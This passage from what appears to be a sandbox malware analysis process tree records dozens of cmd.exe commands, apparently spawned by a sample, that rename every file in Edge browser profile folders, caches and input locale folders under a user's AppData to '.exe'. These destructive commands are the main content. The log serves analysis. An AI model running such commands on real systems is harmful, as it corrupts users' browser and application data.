        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\*.*" "*.exe"
        6⤵
        
        PID:2092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\*.*" "*.exe"
        6⤵
        
        PID:2364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\*.*" "*.exe"
        6⤵
        
        PID:2760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\*.*" "*.exe"
        6⤵
        
        PID:2556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\*.*" "*.exe"
        6⤵
        
        PID:1696
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\*.*" "*.exe"
        6⤵
        
        PID:4868
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\*.*" "*.exe"
        6⤵
        
        PID:4812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\*.*" "*.exe"
        6⤵
        
        PID:1916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\*.*" "*.exe"
        6⤵
        
        PID:1772
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\*.*" "*.exe"
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\*.*" "*.exe"
        6⤵
        
        PID:4344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\OriginTrials\*.*" "*.exe"
        6⤵
        
        PID:2088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved\*.*" "*.exe"
        6⤵
        
        PID:1648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\*.*" "*.exe"
        6⤵
        
        PID:1992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\*.*" "*.exe"
        6⤵
        
        PID:4540
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\*.*" "*.exe"
        6⤵
        
        PID:424
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Speech Recognition\*.*" "*.exe"
        6⤵
        
        PID:224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\*.*" "*.exe"
        6⤵
        
        PID:3220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\*.*" "*.exe"
        6⤵
        
        PID:1768
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\*.*" "*.exe"
        6⤵
        
        PID:2468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\*.*" "*.exe"
        6⤵
        
        PID:3556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\*.*" "*.exe"
        6⤵
        
        PID:1300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\*.*" "*.exe"
        6⤵
        
        PID:2740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\*.*" "*.exe"
        6⤵
        
        PID:3108
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\*.*" "*.exe"
        6⤵
        
        PID:4364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\*.*" "*.exe"
        6⤵
        
        PID:2804
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\*.*" "*.exe"
        6⤵
        
        PID:1660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\*.*" "*.exe"
        6⤵
        
        PID:2364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\*.*" "*.exe"
        6⤵
        
        PID:1468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\*.*" "*.exe"
        6⤵
        
        PID:2832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\*.*" "*.exe"
        6⤵
        
        PID:3236
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\*.*" "*.exe"
        6⤵
        
        PID:1768
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\*.*" "*.exe"
        6⤵
        
        PID:4792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\*.*" "*.exe"
        6⤵
        
        PID:4600
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\*.*" "*.exe"
        6⤵
        
        PID:2916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\*.*" "*.exe"
        6⤵
        
        PID:3340
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\*.*" "*.exe"
        6⤵
        
        PID:4860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\e43882f1-bd4e-4002-b313-e0d06db97624\*.*" "*.exe"
        6⤵
        
        PID:1652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\*.*" "*.exe"
        6⤵
        
        PID:4364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"
        6⤵
        
        PID:1448
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"
        6⤵
        
        PID:424
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*.*" "*.exe"
        6⤵
        
        PID:1564
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\*.*" "*.exe"
        6⤵
        
        PID:3836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\*.*" "*.exe"
        6⤵
        
        PID:3728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"
        6⤵
        
        PID:1384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"
        6⤵
        
        PID:4252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\*.*" "*.exe"
        6⤵
        
        PID:4580
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\*.*" "*.exe"
        6⤵
        
        PID:2312
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\*.*" "*.exe"
        6⤵
        
        PID:844
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"
        6⤵
        
        PID:4828
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\af-ZA\*.*" "*.exe"
        6⤵
        
        PID:2092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-AE\*.*" "*.exe"
        6⤵
        
        PID:1076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-BH\*.*" "*.exe"
        6⤵
        
        PID:660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-DZ\*.*" "*.exe"
        6⤵
        
        PID:2760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-EG\*.*" "*.exe"
        6⤵
        
        PID:1468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-IQ\*.*" "*.exe"
        6⤵
        
        PID:976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-JO\*.*" "*.exe"
        6⤵
        
        PID:3588
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-KW\*.*" "*.exe"
        6⤵
        
        PID:3980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-LB\*.*" "*.exe"
        6⤵
        
        PID:3124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-LY\*.*" "*.exe"
        6⤵
        
        PID:2456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-MA\*.*" "*.exe"
        6⤵
        
        PID:2428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-OM\*.*" "*.exe"
        6⤵
        
        PID:5112
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-QA\*.*" "*.exe"
        6⤵
        
        PID:3144
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-SA\*.*" "*.exe"
        6⤵
        
        PID:844
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2904
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-SY\*.*" "*.exe"
        6⤵
        
        PID:2312
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-TN\*.*" "*.exe"
        6⤵
        
        PID:4828
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-YE\*.*" "*.exe"
        6⤵
        
        PID:2808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\az-Latn-AZ\*.*" "*.exe"
        6⤵
        
        PID:1076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\bg-BG\*.*" "*.exe"
        6⤵
        
        PID:660
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\bn-BD\*.*" "*.exe"
        6⤵
        
        PID:692
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ca-ES\*.*" "*.exe"
        6⤵
        
        PID:1516
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\cs-CZ\*.*" "*.exe"
        6⤵
        
        PID:2896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\da-DK\*.*" "*.exe"
        6⤵
        
        PID:3236
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-AT\*.*" "*.exe"
        6⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-CH\*.*" "*.exe"
        6⤵
        
        PID:1796
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-DE\*.*" "*.exe"
        6⤵
        
        PID:2456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-LI\*.*" "*.exe"
        6⤵
        
        PID:3044
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-LU\*.*" "*.exe"
        6⤵
        
        PID:2088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\el-GR\*.*" "*.exe"
        6⤵
        
        PID:4720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-029\*.*" "*.exe"
        6⤵
        
        PID:4560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-AU\*.*" "*.exe"
        6⤵
        
        PID:2092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-BZ\*.*" "*.exe"
        6⤵
        
        PID:3832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-CA\*.*" "*.exe"
        6⤵
        
        PID:2808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-GB\*.*" "*.exe"
        6⤵
        
        PID:4364
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-HK\*.*" "*.exe"
        6⤵
        
        PID:3128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ID\*.*" "*.exe"
        6⤵
        
        PID:2452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-IE\*.*" "*.exe"
        6⤵
        
        PID:1408
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-IN\*.*" "*.exe"
        6⤵
        
        PID:3512
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-JM\*.*" "*.exe"
        6⤵
        
        PID:3224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-MY\*.*" "*.exe"
        6⤵
        
        PID:1124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-NZ\*.*" "*.exe"
        6⤵
        
        PID:4800
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-SG\*.*" "*.exe"
        6⤵
        
        PID:1384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-TT\*.*" "*.exe"
        6⤵
        
        PID:1992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ZA\*.*" "*.exe"
        6⤵
        
        PID:844
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ZW\*.*" "*.exe"
        6⤵
        
        PID:3652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-419\*.*" "*.exe"
        6⤵
        
        PID:4128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-AR\*.*" "*.exe"
        6⤵
        
        PID:4868
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-BO\*.*" "*.exe"
        6⤵
        
        PID:4364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CL\*.*" "*.exe"
        6⤵
        
        PID:2804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CO\*.*" "*.exe"
        6⤵
        
        PID:4812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CR\*.*" "*.exe"
        6⤵
        
        PID:1516
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-DO\*.*" "*.exe"
        6⤵
        
        PID:1648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-EC\*.*" "*.exe"
        6⤵
        
        PID:2860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-ES\*.*" "*.exe"
        6⤵
        
        PID:1428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-GT\*.*" "*.exe"
        6⤵
        
        PID:1524
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-HN\*.*" "*.exe"
        6⤵
        
        PID:3296
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-MX\*.*" "*.exe"
        6⤵
        
        PID:1760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-NI\*.*" "*.exe"
        6⤵
        
        PID:3144
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PA\*.*" "*.exe"
        6⤵
        
        PID:3340
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PE\*.*" "*.exe"
        6⤵
        
        PID:1772
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PR\*.*" "*.exe"
        6⤵
        
        PID:2728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PY\*.*" "*.exe"
        6⤵
        
        PID:4716
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-SV\*.*" "*.exe"
        6⤵
        
        PID:4868
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-US\*.*" "*.exe"
        6⤵
        
        PID:4392
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-UY\*.*" "*.exe"
        6⤵
        
        PID:980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-VE\*.*" "*.exe"
        6⤵
        
        PID:4812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\et-EE\*.*" "*.exe"
        6⤵
        
        PID:752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\eu-ES\*.*" "*.exe"
        6⤵
        
        PID:2812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fa-IR\*.*" "*.exe"
        6⤵
        
        PID:2632
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fi-FI\*.*" "*.exe"
        6⤵
        
        PID:2916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-029\*.*" "*.exe"
        6⤵
        
        PID:384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-BE\*.*" "*.exe"
        6⤵
        
        PID:5112
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CA\*.*" "*.exe"
        6⤵
        
        PID:3856
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CD\*.*" "*.exe"
        6⤵
        
        PID:1384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CH\*.*" "*.exe"
        6⤵
        
        PID:3996
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CI\*.*" "*.exe"
        6⤵
        
        PID:4128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CM\*.*" "*.exe"
        6⤵
        
        PID:1152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-FR\*.*" "*.exe"
        6⤵
        
        PID:2732
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-HT\*.*" "*.exe"
        6⤵
        
        PID:4368
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-LU\*.*" "*.exe"
        6⤵
        
        PID:740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-MA\*.*" "*.exe"
        6⤵
        
        PID:1080
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-MC\*.*" "*.exe"
        6⤵
        
        PID:4812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-ML\*.*" "*.exe"
        6⤵
        
        PID:3740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-RE\*.*" "*.exe"
        6⤵
        
        PID:752
